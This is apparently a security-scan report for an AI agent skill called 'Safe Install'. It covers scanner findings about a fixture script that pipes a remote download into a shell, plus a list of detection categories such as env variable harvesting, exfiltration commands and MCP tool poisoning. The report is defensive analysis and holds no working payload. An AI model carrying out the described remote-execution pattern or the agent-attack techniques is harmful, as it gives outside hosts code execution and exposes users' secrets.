ClawHub

Safe Install

Security checks across malware telemetry and agentic risk

Overview

This is a disclosed local safety wrapper for installing skills, and the risky shell sample appears to be a test fixture rather than live installer behavior.

Install only if you want a local policy-and-snapshot wrapper for skill installation. Review your policy file, use --force sparingly because it can install skills classified as Avoid, and do not manually run the included avoid-skill fixture script.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Findings (4)

Lp3

Medium
Category
MCP Least Privilege
Confidence
87% confidence
Finding
The skill documentation advertises direct execution of a Node-based installer (`node {baseDir}/bin/safe-install.js`) and therefore has shell-capable behavior, but no corresponding permissions are declared in the skill metadata. This creates a transparency and policy-enforcement gap: users or tooling may treat the skill as lower risk than it is, even though it can invoke local code paths that perform installation, scanning, rollback, and filesystem operations.

Description-Behavior Mismatch

High
Confidence
99% confidence
Finding
The script contradicts the stated purpose of a 'safe-install' skill by directly downloading and executing a remote shell payload with no validation, signature checking, sandboxing, or rollback control. Piping network content into a shell gives the remote host immediate code execution on the target system, making compromise trivial if the endpoint is attacker-controlled or ever becomes compromised.

Context-Inappropriate Capability

Critical
Confidence
100% confidence
Finding
This is arbitrary remote code execution from an external URL in a skill whose context claims safety and validation controls, so the behavior is both unjustified and highly dangerous. The mismatch between the advertised functionality and the actual implementation increases suspicion of deceptive or intentionally harmful behavior.

Missing User Warnings

High
Confidence
98% confidence
Finding
The script executes code retrieved from the network without any user warning, approval step, or disclosure of what will run. This prevents informed consent and gives an external server the ability to perform any shell action under the script's privileges.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal